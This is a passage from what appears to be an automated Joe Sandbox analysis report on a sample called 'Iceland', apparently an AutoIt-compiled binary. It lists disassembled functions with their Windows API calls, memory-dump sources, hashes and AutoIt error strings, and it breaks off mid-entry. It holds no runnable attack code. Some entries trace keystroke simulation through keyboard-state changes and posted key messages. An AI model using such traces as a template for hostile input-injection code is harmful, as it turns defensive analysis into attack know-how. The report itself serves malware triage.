                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                • Opcode ID: e02c40c7a67c1283839666f69194fcceb79a7f90e5496f1bdc5428a58a05fccd
                                                                                                                                                                                                                                                                • Instruction ID: 8c803bdc8989482b1908aaa6124badf667ec29cd53c946d5b9161b96354071b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e02c40c7a67c1283839666f69194fcceb79a7f90e5496f1bdc5428a58a05fccd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08318D72201214BFEB158F94CC89FEB3FADEB49711F044165FE099A1A2D6B59841CBA0
                                                                                                                                                                                                                                                                Function 00AA5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                • API String ID: 0-572801152
                                                                                                                                                                                                                                                                • Opcode ID: ccc7bd2c8871e1481a771abc922c9c980afdd88afc9af6e98c38b5a2eab75838
                                                                                                                                                                                                                                                                • Instruction ID: 4d10cc4ae536934de684e1372c77c4b47d83a4da18d66b9194306ddf246857e0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccc7bd2c8871e1481a771abc922c9c980afdd88afc9af6e98c38b5a2eab75838
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18D1CB71E0060AAFDF10DFA8C885EAEB7B5FF49314F148569E905AB281E770ED41CB64
                                                                                                                                                                                                                                                                Function 00A618A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A6194E
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A619D1
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A61B7B,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61A64
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61A7B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A61B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A61AF7
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A61B22
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00A61B2E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                • Opcode ID: 0f101576bb15aa4fe170a6d86072ea5a02bd3dba96733869688ea3b7c76b2515
                                                                                                                                                                                                                                                                • Instruction ID: 9747cebcae55739dd40fcb72d68f9be89d0f259d0d296224b18418a8ff584e3a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f101576bb15aa4fe170a6d86072ea5a02bd3dba96733869688ea3b7c76b2515
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A91B072F002169ADB208FA5C891AEEBFB5EF19750F1C0629E805E7281E735DC44CBA0
                                                                                                                                                                                                                                                                Function 00AA4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                • Opcode ID: 85a8f1f207e7a8054278a17faa1286f985618adc88e6d698112bf1cebddb6389
                                                                                                                                                                                                                                                                • Instruction ID: 74ef5caff953503a59de60e698248237d6b0cb23b86f05e367d4343402542ead
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85a8f1f207e7a8054278a17faa1286f985618adc88e6d698112bf1cebddb6389
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5918871E00619AFDF24DFA5C888FAEBBB8AF46314F108659F505AB280D7709945CBA4
                                                                                                                                                                                                                                                                Function 00A91B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A91C1B
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91C43
                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A91C67
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91C97
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91D1E
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91D83
                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A91DEF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                • Opcode ID: 668777c1229d243fc5205289bb8061e2b101f98fc49296356e316baa82d8de18
                                                                                                                                                                                                                                                                • Instruction ID: efac849d218af7b9ff0c1261dfc8a967b3fe2ca3081d83b2b53b0568edc50ec2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 668777c1229d243fc5205289bb8061e2b101f98fc49296356e316baa82d8de18
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1491C075B0021A9FDF01DF98C985BBEB7F4FF44715F204029E951AB2A1E774A941CB90
                                                                                                                                                                                                                                                                Function 00AA43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA43C8
                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AA44D7
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA44E7
                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA467C
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantInit.OLEAUT32(00000000), ref: 00A916DE
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantCopy.OLEAUT32(?,?), ref: 00A916E7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A9169E: VariantClear.OLEAUT32(?), ref: 00A916F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                • Opcode ID: 7ce3043a2e71172d8945a22548cfafeabebe963e5af54b2a8944abbd9fd1e2e5
                                                                                                                                                                                                                                                                • Instruction ID: 512d08d128192eb48476439aec01a37d723292ade77b6a767b3bde4e96940bb5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce3043a2e71172d8945a22548cfafeabebe963e5af54b2a8944abbd9fd1e2e5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E912775A083029FC704EF28C58096AB7E5BF8E714F14892DF88997391DB71ED06CB92
                                                                                                                                                                                                                                                                Function 00AA560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?,?,00A80C4E), ref: 00A8091B
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80936
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80944
                                                                                                                                                                                                                                                                  • Part of subcall function 00A808FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?), ref: 00A80954
                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00AA56AE
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AA57B6
                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00AA582C
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00AA5837
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                • Opcode ID: 36705b1ba575901e10a390bdbd003ac6fd54c106f61a23cd8d5b9f7d650a27cc
                                                                                                                                                                                                                                                                • Instruction ID: c864971049fc8210b0bba536d48c1ce3ecf2ea156179a39779c668a188085a45
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36705b1ba575901e10a390bdbd003ac6fd54c106f61a23cd8d5b9f7d650a27cc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 61911671D00629EFDF14DFA4D980EEEBBB9BF08310F104569E915A7291EB359A44CFA0
                                                                                                                                                                                                                                                                Function 00AB2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenu.USER32(?), ref: 00AB2C1F
                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00AB2C51
                                                                                                                                                                                                                                                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AB2C79
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB2CAF
                                                                                                                                                                                                                                                                • GetMenuItemID.USER32(?,?), ref: 00AB2CE9
                                                                                                                                                                                                                                                                • GetSubMenu.USER32(?,?), ref: 00AB2CF7
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A843AD
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: GetCurrentThreadId.KERNEL32 ref: 00A843B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00A84393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A82F00), ref: 00A843BB
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AB2D7F
                                                                                                                                                                                                                                                                  • Part of subcall function 00A8F292: Sleep.KERNEL32 ref: 00A8F30A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                • Opcode ID: 224efb20f2db91ab5ad26a58f94e845077c7191469cfca050f99a9c78f22d407
                                                                                                                                                                                                                                                                • Instruction ID: 413be2f9b1ab1a40e5cde2f848e6e8ad70844f019b2efc5a35c74d2d62f799a1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 224efb20f2db91ab5ad26a58f94e845077c7191469cfca050f99a9c78f22d407
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73718E75A00215AFCB14EF68C945BEEBBF5EF49310F14846AE816EB352DB34ED418B90
                                                                                                                                                                                                                                                                Function 00AB88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00AB8992
                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00AB899E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00AB8A79
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AB8AAC
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,00000000), ref: 00AB8AE4
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 00AB8B06
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AB8B1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                • Opcode ID: 0cbbf86ba1bb838f1587f1e53831ee7824dde73a70eb2d719ff29f80f1cafe28
                                                                                                                                                                                                                                                                • Instruction ID: 14264934d0c41ff380e35da67e5e133e06150ebfdaa20ea90fa5478b80d2c3a4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cbbf86ba1bb838f1587f1e53831ee7824dde73a70eb2d719ff29f80f1cafe28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D718B74600204AFEF25DFA8C894FFABBBDEF09340F14045AE85567262DB39A981DB51
                                                                                                                                                                                                                                                                Function 00A8B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00A8B8C0
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8B8D5
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8B936
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A8B964
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A8B983
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A8B9C4
                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A8B9E7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: 0b4348507f24bf9a1737400838dd8fb137855c40b723f95b0bda13933d75acf3
                                                                                                                                                                                                                                                                • Instruction ID: 2bb13947cc2566b319eee742435cd1618c1c3e3bdc446f05aeb0a76fd67fe51f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b4348507f24bf9a1737400838dd8fb137855c40b723f95b0bda13933d75acf3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F51E1A0A287D53EFB3663348C59BBABEA95B06304F088589E1D5468D3D3D8ECC4D770
                                                                                                                                                                                                                                                                Function 00A8B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 00A8B6E0
                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 00A8B6F5
                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(?), ref: 00A8B756
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A8B782
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A8B79F
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A8B7DE
                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A8B7FF
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 87235514-0
                                                                                                                                                                                                                                                                • Opcode ID: 274826b1102f9d50c03feb657e7125f910c283c709c4f05fc0a299af859b4064
                                                                                                                                                                                                                                                                • Instruction ID: 4228778ac89cb3cdcd496faa7478d0868c1e38d64be000db61f636cdb2044b73
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 274826b1102f9d50c03feb657e7125f910c283c709c4f05fc0a299af859b4064
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 275116A09687D53EFB32A374CC55B7ABEA85F45304F0C8589E1D54A8D2D394EC84D770
                                                                                                                                                                                                                                                                Function 00A557A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
